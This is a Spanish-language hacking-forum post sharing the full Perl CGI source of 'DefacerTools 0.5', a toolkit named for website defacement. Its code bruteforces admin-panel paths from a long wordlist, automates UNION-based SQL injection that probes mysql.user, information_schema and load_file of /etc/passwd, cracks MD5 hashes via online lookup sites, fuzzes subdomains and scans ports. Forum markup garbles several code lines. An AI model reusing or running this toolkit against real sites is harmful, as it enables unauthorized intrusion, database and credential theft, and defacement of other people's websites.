[Perl] DefacerTools 0.5 (regalo de navidad)

  • 0 Respuestas
  • 2531 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil

[Perl] DefacerTools 0.5 (regalo de navidad)

  • en: Diciembre 10, 2011, 09:33:45 am
Hola aca les traigo un regalo de navidad que hice en 3 horas , es un programa en CGI para usar en webs que
soporten el mismo , yo hice todas las pruebas con xampp y al parecer todo funciona bien.

Las funciones del programa son :

  • HexConverter[/li]
  • PanelFinder[/li]
  • PathsFinder[/li]
  • SQLi Scanner[/li]
  • FuzzDNS[/li]
  • FinderPass[/li]
  • PortScanner[/li][/list]

    El codigo del programa (formateado con perltidy) es

    defacertools.cgi

    Código: Perl
    1. #!"\xampp\perl\bin\perl.exe"
    2. #
    3. #DefacerTools 0.5
    4. #
    5. #(C) Doddy Hackman 2012
    6. #
    7. #
    8.  
    9. use CGI;
    10. use LWP::UserAgent;
    11. use URI::Split qw(uri_split);
    12. use HTML::LinkExtor;
    13. use IO::Socket;
    14.  
    15. @panels = (
    16.     'admin/admin.asp',               'admin/login.asp',
    17.     'admin/index.asp',               'admin/admin.aspx',
    18.     'admin/login.aspx',              'admin/index.aspx',
    19.     'admin/webmaster.asp',           'admin/webmaster.aspx',
    20.     'asp/admin/index.asp',           'asp/admin/index.aspx',
    21.     'asp/admin/admin.asp',           'asp/admin/admin.aspx',
    22.     'asp/admin/webmaster.asp',       'asp/admin/webmaster.aspx',
    23.     'admin/',                        'login.asp',
    24.     'login.aspx',                    'admin.asp',
    25.     'admin.aspx',                    'webmaster.aspx',
    26.     'webmaster.asp',                 'login/index.asp',
    27.     'login/index.aspx',              'login/login.asp',
    28.     'login/login.aspx',              'login/admin.asp',
    29.     'login/admin.aspx',              'administracion/index.asp',
    30.     'administracion/index.aspx',     'administracion/login.asp',
    31.     'administracion/login.aspx',     'administracion/webmaster.asp',
    32.     'administracion/webmaster.aspx', 'administracion/admin.asp',
    33.     'administracion/admin.aspx',     'php/admin/',
    34.     'admin/admin.php',               'admin/index.php',
    35.     'admin/login.php',               'admin/system.php',
    36.     'admin/ingresar.php',            'admin/administrador.php',
    37.     'admin/default.php',             'administracion/',
    38.     'administracion/index.php',      'administracion/login.php',
    39.     'administracion/ingresar.php',   'administracion/admin.php',
    40.     'administration/',               'administration/index.php',
    41.     'administration/login.php',      'administrator/index.php',
    42.     'administrator/login.php',       'administrator/system.php',
    43.     'system/',                       'system/login.php',
    44.     'admin.php',                     'login.php',
    45.     'administrador.php',             'administration.php',
    46.     'administrator.php',             'admin1.html',
    47.     'admin1.php',                    'admin2.php',
    48.     'admin2.html',                   'yonetim.php',
    49.     'yonetim.html',                  'yonetici.php',
    50.     'yonetici.html',                 'adm/',
    51.     'admin/account.php',             'admin/account.html',
    52.     'admin/index.html',              'admin/login.html',
    53.     'admin/home.php',                'admin/controlpanel.html',
    54.     'admin/controlpanel.php',        'admin.html',
    55.     'admin/cp.php',                  'admin/cp.html',
    56.     'cp.php',                        'cp.html',
    57.     'administrator/',                'administrator/index.html',
    58.     'administrator/login.html',      'administrator/account.html',
    59.     'administrator/account.php',     'administrator.html',
    60.     'login.html',                    'modelsearch/login.php',
    61.     'moderator.php',                 'moderator.html',
    62.     'moderator/login.php',           'moderator/login.html',
    63.     'moderator/admin.php',           'moderator/admin.html',
    64.     'moderator/',                    'account.php',
    65.     'account.html',                  'controlpanel/',
    66.     'controlpanel.php',              'controlpanel.html',
    67.     'admincontrol.php',              'admincontrol.html',
    68.     'adminpanel.php',                'adminpanel.html',
    69.     'admin1.asp',                    'admin2.asp',
    70.     'yonetim.asp',                   'yonetici.asp',
    71.     'admin/account.asp',             'admin/home.asp',
    72.     'admin/controlpanel.asp',        'admin/cp.asp',
    73.     'cp.asp',                        'administrator/index.asp',
    74.     'administrator/login.asp',       'administrator/account.asp',
    75.     'administrator.asp',             'modelsearch/login.asp',
    76.     'moderator.asp',                 'moderator/login.asp',
    77.     'moderator/admin.asp',           'account.asp',
    78.     'controlpanel.asp',              'admincontrol.asp',
    79.     'adminpanel.asp',                'fileadmin/',
    80.     'fileadmin.php',                 'fileadmin.asp',
    81.     'fileadmin.html',                'administration.html',
    82.     'sysadmin.php',                  'sysadmin.html',
    83.     'phpmyadmin/',                   'myadmin/',
    84.     'sysadmin.asp',                  'sysadmin/',
    85.     'ur-admin.asp',                  'ur-admin.php',
    86.     'ur-admin.html',                 'ur-admin/',
    87.     'Server.php',                    'Server.html',
    88.     'Server.asp',                    'Server/',
    89.     'wp-admin/',                     'administr8.php',
    90.     'administr8.html',               'administr8/',
    91.     'administr8.asp',                'webadmin/',
    92.     'webadmin.php',                  'webadmin.asp',
    93.     'webadmin.html',                 'administratie/',
    94.     'admins/',                       'admins.php',
    95.     'admins.asp',                    'admins.html',
    96.     'administrivia/',                'Database_Administration/',
    97.     'WebAdmin/',                     'useradmin/',
    98.     'sysadmins/',                    'admin1/',
    99.     'system-administration/',        'administrators/',
    100.     'pgadmin/',                      'directadmin/',
    101.     'staradmin/',                    'ServerAdministrator/',
    102.     'SysAdmin/',                     'administer/',
    103.     'LiveUser_Admin/',               'sys-admin/',
    104.     'typo3/',                        'panel/',
    105.     'cpanel/',                       'cPanel/',
    106.     'cpanel_file/',                  'platz_login/',
    107.     'rcLogin/',                      'blogindex/',
    108.     'formslogin/',                   'autologin/',
    109.     'support_login/',                'meta_login/',
    110.     'manuallogin/',                  'simpleLogin/',
    111.     'loginflat/',                    'utility_login/',
    112.     'showlogin/',                    'memlogin/',
    113.     'members/',                      'login-redirect/',
    114.     'sub-login/',                    'wp-login/',
    115.     'login1/',                       'dir-login/',
    116.     'login_db/',                     'xlogin/',
    117.     'smblogin/',                     'customer_login/',
    118.     'UserLogin/',                    'login-us/',
    119.     'acct_login/',                   'admin_area/',
    120.     'bigadmin/',                     'project-admins/',
    121.     'phppgadmin/',                   'pureadmin/',
    122.     'sql-admin/',                    'radmind/',
    123.     'openvpnadmin/',                 'wizmysqladmin/',
    124.     'vadmind/',                      'ezsqliteadmin/',
    125.     'hpwebjetadmin/',                'newsadmin/',
    126.     'adminpro/',                     'Lotus_Domino_Admin/',
    127.     'bbadmin/',                      'vmailadmin/',
    128.     'Indy_admin/',                   'ccp14admin/',
    129.     'irc-macadmin/',                 'banneradmin/',
    130.     'sshadmin/',                     'phpldapadmin/',
    131.     'macadmin/',                     'administratoraccounts/',
    132.     'admin4_account/',               'admin4_colon/',
    133.     'radmind-1/',                    'Super-Admin/',
    134.     'AdminTools/',                   'cmsadmin/',
    135.     'SysAdmin2/',                    'globes_admin/',
    136.     'cadmins/',                      'phpSQLiteAdmin/',
    137.     'navSiteAdmin/',                 'server_admin_small/',
    138.     'logo_sysadmin/',                'server/',
    139.     'database_administration/',      'power_user/',
    140.     'system_administration/',        'ss_vms_admin_sm/'
    141. );
    142.  
    143. my @dns = ('www');
    144.  
    145. #my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');
    146.  
    147. my $nave = LWP::UserAgent->new;
    148. $nave->agent(
    149. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
    150. );
    151. $nave->timeout(5);
    152.  
    153. my %rta;
    154.  
    155. my $que  = new CGI;
    156. my @ques = $que->param;
    157.  
    158. for (@ques) {
    159.     $rta{$_} = $que->param($_);
    160. }
    161.  
    162. print "Content-type:text/html\n\n";
    163.  
    164. <style type=text/css>
    165.  
    166.  
    167. .main {
    168. margin         : -287px 0px 0px -490px;
    169. border         : White solid 1px;
    170. BORDER-COLOR: #00FF00;
    171. }
    172.  
    173. #pie {
    174. position: absolute;
    175. bottom: 0;
    176. }
    177.  
    178. body,a:link {
    179. font: normal 16px Verdana, Arial, Helvetica,
    180. sans-serif;
    181. background-color: #000000;
    182. color:#00FF00;
    183. Courier New;
    184. cursor:crosshair;
    185. font-size: small;
    186. }
    187.  
    188. input,table.outset,table.bord,table,textarea,select {
    189. background-color:black;color:#00FF00;
    190. border: solid 1px #00FF00;
    191. border-color:#00FF00
    192. }
    193.  
    194. a:link,a:visited,a:active {
    195. color: #00FF00;
    196. font: normal 16px Verdana, Arial, Helvetica,
    197. sans-serif;
    198. text-decoration: none;
    199. }
    200.  
    201. </style>";
    202.  
    203. if ( $rta{'hex'} ) {
    204.     logouno();
    205.     print
    206. qq(<form method=post action=''><b>Text to encode : </b><input type=text name=textocode value=test><input type=submit name=codificar value=Encode></form>);
    207.     copyright();
    208. }
    209. elsif ( $rta{'textocode'} ) {
    210.     logouno();
    211.     print "</li><li type="square"> Encode : <b>" . encode( $rta{'textocode'} ) . "</b><br><br>";[/li][/list]
    212.     print "</center>";
    213.     copyright();
    214. }
    215. elsif ( $rta{'panelfinder'} ) {
    216.     logodos();
    217.     print
    218. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpanel value=http://localhost/><input type=submit value=Find></form>);
    219.     copyright();
    220. }
    221. elsif ( $rta{'buscarpanel'} ) {
    222.  
    223.     my $page = $rta{'buscarpanel'};
    224.     logodos();
    225.     print "<br></li><li type="square"> Scanning $page<br><br>";[/li][/list]
    226.     for $path (@panels) {
    227.         $code = tomax( $page . "/" . $path );
    228.         if ( $code->is_success ) {
    229.             print "[Link] : " . $page . "/" . $path . "<br>";
    230.         }
    231.     }
    232.     print "<br><br></li><li type="square"> Finish<br>";[/li][/list]
    233.     copyright();
    234. }
    235. elsif ( $rta{'pathsfinder'} ) {
    236.     logotres();
    237.     print
    238. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpaths value=http://localhost/doddy><input type=submit name=codificar value=Find></form>);
    239.     copyright();
    240. }
    241. elsif ( $rta{'buscarpaths'} ) {
    242.     logotres();
    243.  
    244.     my $page = $rta{'buscarpaths'};
    245.  
    246.     my $code  = toma($page);
    247.     my @links = get_links($code);
    248.  
    249.     print "<br><br></li><li type="square"> Finding paths<br><br>";[/li][/list]
    250.  
    251.     for my $com (@links) {
    252.         my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
    253.         if ( $path =~ /\/(.*)$/ ) {
    254.             my $path1 = $1;
    255.             $page =~ s/$path1//ig;
    256.             my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
    257.             if ( $path =~ /(.*)\// ) {
    258.                 my $parche = $1;
    259.                 unless ( $repetidos =~ /$parche/ ) {
    260.                     $repetidos .= " " . $parche;
    261.                     my $code = toma( "http://" . $auth . $parche );
    262.  
    263.                     if ( $code =~ /Index of (.*)</ig ) {
    264.                         my $dir_found = $1;
    265.                         chomp $dir_found;
    266.                         print "</li><li type="square"> Directory Found : $page/$dir_found<br>";[/li][/list]
    267.                     }
    268.                 }
    269.             }
    270.         }
    271.     }
    272.     print "<br><br></li><li type="square">Finished<br>";[/li][/list]
    273.     copyright();
    274. }
    275. elsif ( $rta{'sqliscanner'} ) {
    276.     logocuatro();
    277.     print
    278. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarsql value=http://localhost/sql.php?id=><input type=submit name=codificar value=Scan></form>);
    279.     copyright();
    280. }
    281. elsif ( $rta{'buscarsql'} ) {
    282.     logocuatro();
    283.     print "<br><br></li><li type="square"> Scanning page<br><br>";[/li][/list]
    284.     &length( $rta{'buscarsql'} );
    285.     print "<br><br></li><li type="square"> Finished";[/li][/list]
    286.     copyright();
    287. }
    288. elsif ( $rta{'fuzzdns'} ) {
    289.     logocinco();
    290.     print
    291. qq(<form method=post action=''><b>Host : </b><input type=text name=buscardns value=google.com><input type=submit name=codificar value=Scan></form>);
    292.     copyright();
    293. }
    294. elsif ( $rta{'buscardns'} ) {
    295.     logocinco();
    296.  
    297.     my $page = $rta{'buscardns'};
    298.  
    299.     print "<br><br></li><li type="square"> Searching DNS to " . $page . ".....<br><br><br>";[/li][/list]
    300.     for my $path (@dns) {
    301.         $code = tomax( "http://" . $path . "." . $page );
    302.         if ( $code->is_success ) {
    303.             print "</li><li type="square"> Found : http://" . $path . "." . $page . "<br>";[/li][/list]
    304.         }
    305.     }
    306.     print "<br><br></li><li type="square"> Finished<br><br>";[/li][/list]
    307.     copyright();
    308. }
    309. elsif ( $rta{'finderpass'} ) {
    310.     logoseis();
    311.     print
    312. qq(<form method=post action=''><b>MD5 : </b><input type=text name=buscarhash value=202cb962ac59075b964b07152d234b70><input type=submit name=codificar value=Scan></form>);
    313.     copyright();
    314. }
    315. elsif ( $rta{'buscarhash'} ) {
    316.     logoseis();
    317.     &crackit( $rta{'buscarhash'} );
    318.     copyright();
    319. }
    320. elsif ( $rta{'portscanner'} ) {
    321.     logosiete();
    322.     print
    323. qq(<form method=post action=''><b>IP : </b><input type=text name=buscarpuertos value=localhost><input type=submit name=codificar value=Scan></form>);
    324.     copyright();
    325. }
    326. elsif ( $rta{'buscarpuertos'} ) {
    327.     logosiete();
    328.     scanuno( $rta{'buscarpuertos'} );
    329.     copyright();
    330. }
    331. elsif ( $rta{'home'} ) {
    332.     sintax();
    333. }
    334. else {
    335.     sintax();
    336. }
    337.  
    338. sub sintax {
    339.     print qq(
    340. <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title>
    341. <br><br>
    342. <h1><center>DefacerTools</center></h1>
    343. <br><br>
    344. <center>
    345. <table border=1>
    346. <td class=main><center><b>Tools</b></center></td><tr>
    347. <td class=main><a href=?hex=true><center>HexConverter</center></a></td><tr>
    348. <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr>
    349. <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr>
    350. <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr>
    351. <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr>
    352. <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr>
    353. <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td>
    354. </table>
    355. </center>  
    356. );
    357. }
    358.  
    359. sub logouno {
    360.     print qq(
    361. <center>
    362. <pre>
    363.  
    364.  
    365.  
    366.  @    @                 @@@@                                        
    367.  @    @                @    @                            @          
    368.  @    @                @                                 @          
    369.  @    @   @@@  @  @    @       @@@  @ @@  @   @  @@@  @@ @@  @@@  @@
    370.  @@@@@@  @   @ @  @    @      @   @ @@  @ @   @ @   @ @  @  @   @ @
    371.  @    @  @@@@@  @@     @      @   @ @   @  @ @  @@@@@ @  @  @@@@@ @
    372.  @    @  @      @@     @      @   @ @   @  @ @  @     @  @  @     @
    373.  @    @  @   @ @  @    @    @ @   @ @   @   @   @   @ @  @  @   @ @
    374.  @    @   @@@  @  @     @@@@   @@@  @   @   @    @@@  @   @  @@@  @
    375.  
    376.  
    377.  
    378.  
    379. </pre>
    380.  
    381.  
    382. );
    383. }
    384.  
    385. sub logodos {
    386.     print qq(
    387. <center>
    388. <pre>
    389.  
    390.  
    391.  
    392.  @@@@@                    @ @@@@@ @           @        
    393.  @    @                   @ @                 @        
    394.  @    @                   @ @                 @        
    395.  @    @  @@@  @ @@   @@@  @ @     @ @ @@   @@@@  @@@  @@
    396.  @@@@@      @ @@  @ @   @ @ @@@@  @ @@  @ @   @ @   @ @
    397.  @       @@@@ @   @ @@@@@ @ @     @ @   @ @   @ @@@@@ @
    398.  @      @   @ @   @ @     @ @     @ @   @ @   @ @     @
    399.  @      @   @ @   @ @   @ @ @     @ @   @ @   @ @   @ @
    400.  @       @@@@ @   @  @@@  @ @     @ @   @  @@@@  @@@  @
    401.  
    402.  
    403.  
    404.  
    405. </pre>
    406.  
    407.  
    408. );
    409. }
    410.  
    411. sub logotres {
    412.     print qq(
    413. <center>
    414. <pre>
    415.  
    416.  
    417.  
    418.  @@@@@           @          @@@@@ @           @        
    419.  @    @       @  @          @                 @        
    420.  @    @       @  @          @                 @        
    421.  @    @  @@@  @@ @ @@   @@  @     @ @ @@   @@@@  @@@  @@
    422.  @@@@@      @ @  @@  @ @  @ @@@@  @ @@  @ @   @ @   @ @
    423.  @       @@@@ @  @   @  @   @     @ @   @ @   @ @@@@@ @
    424.  @      @   @ @  @   @   @  @     @ @   @ @   @ @     @
    425.  @      @   @ @  @   @ @  @ @     @ @   @ @   @ @   @ @
    426.  @       @@@@  @ @   @  @@  @     @ @   @  @@@@  @@@  @
    427.  
    428.  
    429.  
    430.  
    431.  
    432. </pre>
    433.  
    434.  
    435. );
    436. }
    437.  
    438. sub logocuatro {
    439.     print qq(
    440. <center>
    441. <pre>
    442.  
    443.  
    444.  
    445.   @@@    @@@@   @     @      @@@                                  
    446.  @   @  @    @  @     @     @   @                                  
    447.  @      @    @  @     @     @                                      
    448.  @      @    @  @     @     @       @@@   @@@  @ @@  @ @@   @@@  @@
    449.   @@@   @    @  @     @      @@@   @   @     @ @@  @ @@  @ @   @ @
    450.      @  @    @  @     @         @  @      @@@@ @   @ @   @ @@@@@ @
    451.      @  @  @ @  @     @         @  @     @   @ @   @ @   @ @     @
    452.  @   @  @   @@  @     @     @   @  @   @ @   @ @   @ @   @ @   @ @
    453.   @@@    @@@@   @@@@@ @      @@@    @@@   @@@@ @   @ @   @  @@@  @
    454.              @                                                    
    455.  
    456.  
    457.  
    458.  
    459.  
    460. </pre>
    461.  
    462.  
    463. );
    464. }
    465.  
    466. sub logocinco {
    467.     print qq(
    468. <center>
    469. <pre>
    470.  
    471.  
    472.  
    473.  @@@@@                    @@@@    @    @   @@@
    474.  @                        @   @   @@   @  @   @
    475.  @                        @    @  @@   @  @    
    476.  @     @   @ @@@@ @@@@    @    @  @ @  @  @    
    477.  @@@@  @   @    @    @    @    @  @ @  @   @@@
    478.  @     @   @   @    @     @    @  @  @ @      @
    479.  @     @   @  @    @      @    @  @   @@      @
    480.  @     @  @@ @    @       @   @   @   @@  @   @
    481.  @      @@ @ @@@@ @@@@    @@@@    @    @   @@@
    482.  
    483.  
    484.  
    485.  
    486.  
    487.  
    488. </pre>
    489.  
    490.  
    491. );
    492. }
    493.  
    494. sub logoseis {
    495.     print qq(
    496. <center>
    497. <pre>
    498.  
    499.  
    500.  
    501.  @@@@@ @           @          @@@@@                
    502.  @                 @          @    @                
    503.  @                 @          @    @                
    504.  @     @ @ @@   @@@@  @@@  @@ @    @  @@@   @@   @@
    505.  @@@@  @ @@  @ @   @ @   @ @  @@@@@      @ @  @ @  @
    506.  @     @ @   @ @   @ @@@@@ @  @       @@@@  @    @  
    507.  @     @ @   @ @   @ @     @  @      @   @   @    @
    508.  @     @ @   @ @   @ @   @ @  @      @   @ @  @ @  @
    509.  @     @ @   @  @@@@  @@@  @  @       @@@@  @@   @@
    510.  
    511.  
    512.  
    513.  
    514.  
    515.  
    516.  
    517. </pre>
    518.  
    519.  
    520. );
    521. }
    522.  
    523. sub logosiete {
    524.     print qq(
    525. <center>
    526. <pre>
    527.  
    528.  
    529.  
    530.  @@@@@               @@@                                  
    531.  @    @          @  @   @                                  
    532.  @    @          @  @                                      
    533.  @    @  @@@  @@ @@ @       @@@   @@@  @ @@  @ @@   @@@  @@
    534.  @@@@@  @   @ @  @   @@@   @   @     @ @@  @ @@  @ @   @ @
    535.  @      @   @ @  @      @  @      @@@@ @   @ @   @ @@@@@ @
    536.  @      @   @ @  @      @  @     @   @ @   @ @   @ @     @
    537.  @      @   @ @  @  @   @  @   @ @   @ @   @ @   @ @   @ @
    538.  @       @@@  @   @  @@@    @@@   @@@@ @   @ @   @  @@@  @
    539.  
    540.  
    541.  
    542.  
    543.  
    544.  
    545.  
    546.  
    547. </pre>
    548.  
    549.  
    550. );
    551. }
    552.  
    553. sub copyright {
    554.     print
    555. qq(<br><br><br><br><br><br><br><center><a href=?home=true><b>Return to home</b></a></center><br><br>);
    556. }
    557.  
    558. sub length {
    559.     print "<br></li><li type="square"> Looking for the number of columns<br><br>";[/li][/list]
    560.     my $rows = "0";
    561.     my $asc;
    562.     my $page = $_[0];
    563.     ( $pass1, $pass2 ) = &bypass( $_[1] );
    564.  
    565.     $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
    566.     $total = "1";
    567.     for my $rows ( 2 .. 200 ) {
    568.         $asc .=
    569.           "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
    570.         $total .= "," . $rows;
    571.         $injection =
    572.             $page . "1"
    573.           . $pass1 . "and"
    574.           . $pass1 . "1=0"
    575.           . $pass1 . "union"
    576.           . $pass1
    577.           . "select"
    578.           . $pass1
    579.           . $alert
    580.           . $asc;
    581.         $test = toma($injection);
    582.         if ( $test =~ /RATSXPDOWN/ ) {
    583.             @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
    584.             $control = 1;
    585.             my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
    586.             my $save = $auth;
    587.             $total =~ s/$number[0]/hackman/;
    588.             print "[SQLI] : "
    589.               . $page . "1"
    590.               . $pass1 . "and"
    591.               . $pass1 . "1=0"
    592.               . $pass1 . "union"
    593.               . $pass1
    594.               . "select"
    595.               . $pass1
    596.               . $total . "<br>";
    597.             details(
    598.                 $page . "1"
    599.                   . $pass1 . "and"
    600.                   . $pass1 . "1=0"
    601.                   . $pass1 . "union"
    602.                   . $pass1
    603.                   . "select"
    604.                   . $pass1
    605.                   . $total,
    606.                 "--", ""
    607.             );
    608.         }
    609.     }
    610. }
    611.  
    612. sub details {
    613.     my ( $page, $bypass, $save ) = @_;
    614.     ( $pass1, $pass2 ) = &bypass($bypass);
    615.     if ( $page =~ /(.*)hackman(.*)/ig ) {
    616.         print "<br></li><li type="square"> Searching information..<br><br>";[/li][/list]
    617.         my ( $start, $end ) = ( $1, $2 );
    618.         $inforschema =
    619.             $start
    620.           . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
    621.           . $end
    622.           . $pass1 . "from"
    623.           . $pass1
    624.           . "information_schema.tables"
    625.           . $pass2;
    626.         $mysqluser =
    627.             $start
    628.           . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
    629.           . $end
    630.           . $pass1 . "from"
    631.           . $pass1
    632.           . "mysql.user"
    633.           . $pass2;
    634.         $test3 =
    635.           toma( $start
    636.               . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
    637.               . $end
    638.               . $pass2 );
    639.         $test1 = toma($inforschema);
    640.         $test2 = toma($mysqluser);
    641.         if ( $test2 =~ /ERTOR854/ig ) {
    642.             print "[mysql.user] : ON<br>";
    643.         }
    644.         else {
    645.             print "[mysql.user] : OFF<br>";
    646.         }
    647.         if ( $test1 =~ /ERTOR854/ig ) {
    648.             print "[information_schema.tables] : ON<br>";
    649.         }
    650.         else {
    651.             print "[information_schema.tables] : OFF<br>";
    652.         }
    653.         if ( $test3 =~ /ERTOR854/ig ) {
    654.             print "[load_file] : ON<br>";
    655.         }
    656.         $concat =
    657. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
    658.         $injection = $start . $concat . $end . $pass2;
    659.         $code      = toma($injection);
    660.         if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
    661.             print
    662. "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>";
    663.         }
    664.         else {
    665.             print "<br>[-] Not found any data<br>";
    666.         }
    667.     }
    668. }
    669.  
    670. sub encode {
    671.     my $string = $_[0];
    672.     $hex = '0x';
    673.     for ( split //, $string ) {
    674.         $hex .= sprintf "%x", ord;
    675.     }
    676.     return $hex;
    677. }
    678.  
    679. sub bypass {
    680.     if    ( $_[0] eq "/*" )  { return ( "/**/", "/**/" ); }
    681.     elsif ( $_[0] eq "%20" ) { return ( "%20",  "%00" ); }
    682.     else                     { return ( "+",    "--" ); }
    683. }
    684.  
    685. sub ascii {
    686.     return join ',', unpack "U*", $_[0];
    687. }
    688.  
    689. sub toma {
    690.     return $nave->get( $_[0] )->content;
    691. }
    692.  
    693. sub tomax {
    694.     return $nave->get( $_[0] );
    695. }
    696.  
    697. sub get_links {
    698.  
    699.     $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
    700.     return @links;
    701.  
    702.     sub agarrar {
    703.         my ( $a, %b ) = @_;
    704.         push( @links, values %b );
    705.     }
    706. }
    707.  
    708. sub crackit {
    709.  
    710.     my $secret = $_[0];
    711.  
    712.     print "<br><br></li><li type="square"> Cracking $_[0]<br><br>";[/li][/list]
    713.  
    714.     my %hash = (
    715.  
    716.         'http://passcracking.com/' => {
    717.             'tipo'      => 'post',
    718.             'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
    719.             'regex' =>
    720. '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
    721.         },
    722.         'http://md5.hashcracking.com/search.php?md5=' => {
    723.             'tipo'  => 'get',
    724.             'regex' => 'Cleartext of $_[0] is (.*)',
    725.         },
    726.         'http://www.bigtrapeze.com/md5/' => {
    727.             'tipo'      => 'post',
    728.             'variables' => '{"query" => $_[0], "submit" => " Crack "}',
    729.             'regex' =>
    730. 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
    731.         },
    732.         'http://opencrack.hashkiller.com/' => {
    733.             'tipo' => 'post',
    734.             'variables' =>
    735.               '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
    736.             'regex' => qq(<\/div><div class="result">$_[0]<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.+)<br\/>),
    737.         },
    738.         'http://www.hashchecker.com/index.php?_sls=search_hash' => {
    739.             'tipo'      => 'post',
    740.             'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
    741.             'regex' =>
    742. '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
    743.         },
    744.         'http://victorov.su/md5/?md5e=&md5d=' => {
    745.             'tipo'  => 'get',
    746.             'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
    747.        }
    748.    );
    749.  
    750.    for my $data ( keys %hash ) {
    751.  
    752.        if ( $hash{$data}{tipo} eq "get" ) {
    753.            $code = toma( $data . $_[0] );
    754.            if ( $code =~ /$hash{$data}{regex}/ig ) {
    755.                print "<br></li><li type="square"> Decoded : " . $1 . "<br><br>";[/li][/list]
    756.                print $secret. ":" . $1 . "<br>";
    757.            }
    758.        }
    759.        else {
    760.            $code = tomar( $data, $hash{$data}{variables} );
    761.            if ( $code =~ /$hash{$data}{regex}/ig ) {
    762.                print $secret. ":" . $1 . "<br>";
    763.            }
    764.        }
    765.    }
    766.    print "<br></li><li type="square"> Finish<br>";[/li][/list]
    767. }
    768.  
    769. sub tomar {
    770.    my ( $web, $var ) = @_;
    771.    return $nave->post( $web, [ %{$var} ] )->content;
    772. }
    773.  
    774. sub scanuno {
    775.  
    776.    my %ports = (
    777.        "21"   => "ftp",
    778.        "22"   => "ssh",
    779.        "25"   => "smtp",
    780.        "80"   => "http",
    781.        "110"  => "pop3",
    782.        "3306" => "mysql"
    783.    );
    784.  
    785.    print "<br></li><li type="square"> Scanning $_[0]<br><br><br>";[/li][/list]
    786.  
    787.    for my $port ( keys %ports ) {
    788.  
    789.        if (
    790.            new IO::Socket::INET(
    791.                PeerAddr => $_[0],
    792.                PeerPort => $port,
    793.                Proto    => "tcp",
    794.                Timeout  => 0.5
    795.            )
    796.          )
    797.        {
    798.            print "[Port] : "
    799.              . $port
    800.              . " [Service] : "
    801.              . $ports{$port} . "<br>";
    802.        }
    803.    }
    804.    print "<br><br></li><li type="square"> Scan Finish<br>";[/li][/list]
    805. }
    806.  
    807. # The End ?
    808.  
    809.  
« Última modificación: Marzo 14, 2015, 10:17:00 am por Expermicid »

 

Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 5330
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 3473
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 3015
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d
